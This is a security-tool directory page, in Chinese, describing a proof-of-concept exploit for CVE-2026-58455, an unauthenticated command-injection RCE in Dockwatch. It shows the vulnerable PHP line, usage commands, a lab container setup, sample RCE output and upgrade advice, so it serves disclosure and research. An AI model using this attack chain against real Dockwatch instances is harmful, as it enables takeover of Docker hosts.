Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-58455-PoC — 针对 CVE-2026-58455 的 PoC:Dockwatch <=0.6.567 未认证 RCE。仅使用标准库的 Python。 | Kitploit
工具/GitHubGitHub/boreas37/cve-2026-58455-poc
容器安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试实验室与实践
GitHubboreas37/cve-2026-58455-poc

CVE-2026-58455-PoC

针对 CVE-2026-58455 的 PoC:Dockwatch <=0.6.567 未认证 RCE。仅使用标准库的 Python。

查看仓库
3天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-58455 — Dockwatch 未授权远程代码执行(认证绕过 + 命令注入)

CVE-2026-58455 的概念验证:在 Dockwatch(由 Notifiarr 开发)中发现未授权远程代码执行漏洞,这是一个自托管的 Docker 容器管理 Web 界面。影响所有直至 0.6.567 的版本。

根本原因(已从源码验证)

三个缺陷串联在一起:

  1. 未经验证即设置会话标志 — GET /includes/header.php 会对任何访客执行 $_SESSION['IN_DOCKWATCH'] = true;。AJAX 层 (ajax/shared.php)仅检查此标志。
  2. 认证重定向后缺少 exit() — 当 $_SESSION['authenticated'] 为假时,loader.php 会发送 Location: login.php 头,但不会终止执行,因此请求的其余部分会继续运行。
  3. 操作系统命令注入 — ajax/compose.php(m=composePull)使用未经清理的输入构建 shell 命令:
    root@kitploit:~
    $cmd = 'cd ' . $_POST['composePath'] . ' && docker-compose pull';
    $pull = $shell->exec($cmd . ' 2>&1');
    
    输出会直接反映在 HTTP 响应中。

串联利用后:未经认证的远程攻击者可以容器内 Web 服务器用户的身份执行任意操作系统命令。典型部署会将 /var/run/docker.sock 挂载进容器 → 等同于宿主机上的 root 权限。

使用方法

root@kitploit:~
python3 dockwatch_rce_poc.py --url http://HOST:PORT --command "id; hostname"
python3 dockwatch_rce_poc.py --url http://localhost:8888            # defaults

仅需 Python 3 标准库。

实验环境(复现)

root@kitploit:~
docker run -d --name dockwatch-lab -p 8888:80 \
  -v /var/run/docker.sock:/var/run/docker.sock \
  ghcr.io/notifiarr/dockwatch:v0.6.567

验证输出

root@kitploit:~
$ python3 dockwatch_rce_poc.py --url http://localhost:8888 --command "id; hostname"
[+] Dockwatch fingerprint confirmed (200) <title>Dockwatch</title>
[+] Session primed (IN_DOCKWATCH flag set)
[*] ajax/compose.php responded HTTP 200, 100 bytes
[+] Command output recovered:
    uid=911(abc) gid=911(abc) groups=911(abc),281(unraiddocker),992(groupls7j),1000(users)
=> PASS (RCE confirmed)

修复建议

请将 Dockwatch 升级到 0.6.567 之后的版本。作为缓解措施,不要将 Dockwatch 暴露给不受信任的网络,并在非必要情况下移除 Docker 套接字挂载。

免责声明

仅供授权的安全研究和实验环境使用。

下载工具